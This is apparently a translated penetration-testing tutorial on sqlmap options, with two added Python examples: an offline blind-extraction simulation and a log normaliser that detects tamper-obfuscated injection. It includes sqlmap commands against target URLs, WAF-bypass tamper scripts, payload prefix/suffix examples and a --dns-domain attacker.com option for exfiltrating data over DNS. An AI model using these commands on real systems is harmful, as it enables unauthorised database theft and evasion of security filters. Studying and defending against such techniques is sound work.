SQLMAP Automatic Injection
Optimization
"Optimize performance parameters for increased efficiency"
-o: Turns on the three switches below at once (--predict-output, --keep-alive, --null-connection)
--predict-output:
Predicts the characters of the value being retrieved from a statistics table of common outputs, narrowing the search range for each character and speeding up retrieval
Predictable return values: version string, user name, password, privileges, role, database name, table name, column name
Incompatible with the --threads parameter
Statistics table: /usr/share/sqlmap/txt/common-outputs.txt
--keep-alive: "avoids the situation where the number of connections grows very large, but can trigger alarms"
Uses persistent HTTP(S) connections for better performance
Incompatible with the --proxy parameter
Persistent connections avoid the network overhead of repeatedly establishing connections, but a large number of persistent connections can seriously consume server resources
--null-connection:
Retrieves only the size of the response page, not its content
Usually used in blind injection to tell true from false, reducing network bandwidth consumption
Incompatible with the --text-only parameter (which decides true/false by comparing page content)
--threads: "1 by default"
Maximum number of concurrent requests
In blind injection each thread retrieves one character (about 7 requests per character, bisecting the low ASCII range); once the character is done the thread ends
The default value is 1; no more than 10 is recommended, or the availability of the site may suffer
Incompatible with the --predict-output parameter
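An added example, not from the original notes, to make the 7-requests-per-character figure above concrete: a local simulation of bisection over the ASCII range against a constructed in-memory string, counting how many true/false oracle answers (one per HTTP request, as the server would see them) each character costs. The oracle and the secret value are assumptions for illustration; nothing here touches a network.

```python
# Added example (not from the original notes): local simulation of the
# per-character cost of boolean-blind retrieval.  The oracle only answers
# "is the byte at position i greater than x?", so a bisection over the
# 7-bit ASCII range costs exactly 7 yes/no requests per character.
# The secret is a constructed in-memory string; no network is involved.
# (sqlmap first determines the length with a similar bisection; omitted here.)
from typing import Callable, Dict, Tuple

SECRET = "sqlmap_user"   # constructed sample value that is being "extracted"
ASCII_MAX = 127          # bisection range 0..127, as in the note above


def make_oracle(secret: str) -> Tuple[Callable[[int, int], bool], Dict[str, int]]:
    """Each oracle call stands for one HTTP request whose true/false page
    is compared; the dict counts how many such requests were made."""
    calls = {"n": 0}

    def oracle(pos: int, threshold: int) -> bool:
        calls["n"] += 1
        return ord(secret[pos]) > threshold

    return oracle, calls


def extract_char(oracle, pos: int, lo: int = 0, hi: int = ASCII_MAX) -> str:
    """Bisection: every answer halves the remaining [lo, hi] interval."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):      # character code is above mid
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(secret: str) -> Tuple[str, int]:
    """Recover the whole string; return it with the total request count."""
    oracle, calls = make_oracle(secret)
    value = "".join(extract_char(oracle, i) for i in range(len(secret)))
    return value, calls["n"]


def requests_per_char(secret: str) -> float:
    """Average requests per character; 7.0 for any 0..127 bisection."""
    value, n = extract(secret)
    assert value == secret
    return n / len(secret)


if __name__ == "__main__":
    print(extract(SECRET))            # ('sqlmap_user', 77)
    print(requests_per_char(SECRET))  # 7.0
```

With --threads=10 the same total is spread over ten characters in flight at once, which is the tenfold request rate the availability warning above refers to.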
Injection
-p:
Specifies the parameter(s) to test; other parameters are not tested, so --level no longer expands the set of tested parameters
-p "User-Agent,Referer"   # test only these two parameters
--skip:
Excludes the specified parameters from testing
--level=5 --skip="id,User-Agent"
URI injection point: "if the variable name and value are part of the URL path (they look like directories), you need to mark the injection point manually by appending an asterisk to the value"
sqlmap -u "http://targeturl/value1*/param2/value2/"
--dbms: "specify the database type of the target server"
--dbms="MySQL"
--os:
Linux/Windows
--invalid-bignum / --invalid-logical
By default sqlmap invalidates a parameter value with a negative number, e.g. id=13 -> id=-13
--invalid-bignum uses a large number to invalidate the value instead: id=99999999999
--invalid-logical uses a Boolean condition to invalidate the value: id=13 AND 18=19
--no-cast
When extracting data, sqlmap casts every result to a string and represents NULL results with a space
This switch needs to be turned on for old MySQL versions
--no-escape "By default sqlmap escapes string literals in payloads by encoding them"
For obfuscation and to avoid quoting errors, when a payload contains a single-quoted string, sqlmap replaces the string with its CHAR() encoding
### SELECT 'foo' -> SELECT CHAR(102)+CHAR(111)+CHAR(111)
This switch turns that feature off
--prefix/--suffix "payload prefix/suffix"
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
## e.g.: sqlmap -u "http://1.1.1.1/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
Resulting query:
query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
--tamper "Premise: the scan shows that input is being filtered"
Specifies obfuscation scripts that try to bypass application-layer filtering, IPS or WAF
sqlmap -u "http://dadad" --
# script location: /usr/share/sqlmap/tamper   "dpkg -L sqlmap | grep tamper can be used to list them"
sqlmap -u "http://URL" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space2comment.py" -v 3   # "-v: show more information"
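An added defensive example, not from the original notes: an access-log normaliser that undoes the three tamper transformations named above (randomcase, space2comment, between) before matching simple injection signatures, so that obfuscation aimed at a WAF does not also hide the payload from log review. The log lines are constructed samples, and the between.py rewrites assumed here (A > B as A NOT BETWEEN 0 AND B, A = B as A BETWEEN B AND B) are my understanding of that script, not quoted from it.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log samples (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%20AnD%201%20bEtWeEn%201%20AnD%201 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1/**/uNiOn/**/sElEcT/**/null,null HTTP/1.1" 500 311',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%20AND%20ASCII(x)%20NOT%20BETWEEN%200%20AND%2064 HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

# Signatures run against the *normalised* query string, so they can stay simple.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean-compare": re.compile(r"\b(?:and|or)\s+\S+\s*[=<>]\s*\S+"),
    "time-delay": re.compile(r"\b(?:sleep|benchmark)\s*\("),
}

def normalise(query: str) -> str:
    """Undo the obfuscations: URL encoding, mixed case (randomcase), /**/ in
    place of spaces (space2comment) and BETWEEN rewrites of > and = (between)."""
    q = unquote_plus(query).lower()
    q = re.sub(r"/\*.*?\*/", " ", q)                              # space2comment
    q = re.sub(r"\s+", " ", q).strip()
    q = re.sub(r"(\S+) not between 0 and (\S+)", r"\1 > \2", q)    # A > B (assumed)
    q = re.sub(r"(\S+) between (\S+) and \2\b", r"\1 = \2", q)     # A = B (assumed)
    return q

def classify(line: str):
    """Return (client_ip, normalised_query, [signature names hit]) or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, path = m.groups()
    query = path.partition("?")[2]
    norm = normalise(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
    return ip, norm, hits

def suspicious(lines):
    """Only the requests that hit at least one signature."""
    return [r for r in map(classify, lines) if r and r[2]]

if __name__ == "__main__":
    for ip, norm, hits in suspicious(LOG_LINES):
        print(ip, hits, norm)
```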
Detection
--level
Level 1-5 (default 1)
Payloads: /usr/share/sqlmap/xml/payloads
--risk
1-4 (default 1, harmless)
A higher risk increases the chance of data tampering (e.g. UPDATE statements)
--string, --not-string, --regexp, --code, --text-only, --titles "Specifies what the true/false decision is based on, according to the type of response"
Page comparison: boolean-based detection decides true/false logic from changes in the content of the returned page, but some pages change on every request (timestamps and the like), so you need to specify the string that marks the true or false state
Techniques "Which SQL injection techniques to test for"
All techniques are used by default
B: boolean-based blind
E: error-based
U: UNION query-based
S: stacked queries (required for file system, operating system and registry access)
T: time-based blind
--time-sec
Response delay used for time-based injection detection (default 5 seconds)
--union-cols
UNION queries test 1-10 columns by default, up to 50 columns as --level increases
--union-cols 6-9
--union-char
UNION queries use NULL by default; in rare cases NULL may not work, and the value can then be specified manually
--union-char 123 "the web application needs to be analyzed in advance"
--dns-domain
Scenario: the attacker controls a DNS server and uses this feature to speed up data extraction
--dns-domain attacker.com
--second-order
The result of injecting on one page is reflected on another page
--second-order http://1.1.1.1/b.php
Fingerprint "Fingerprint information"
-f, --fingerprint, -b, --banner
Database management system fingerprint information
DBMS, operating system, architecture, patches
Small white diary 45: Kali penetration testing, web infiltration - sqlmap automatic injection (iii) - sqlmap parameter details: optimization, injection, detection, techniques, fingerprint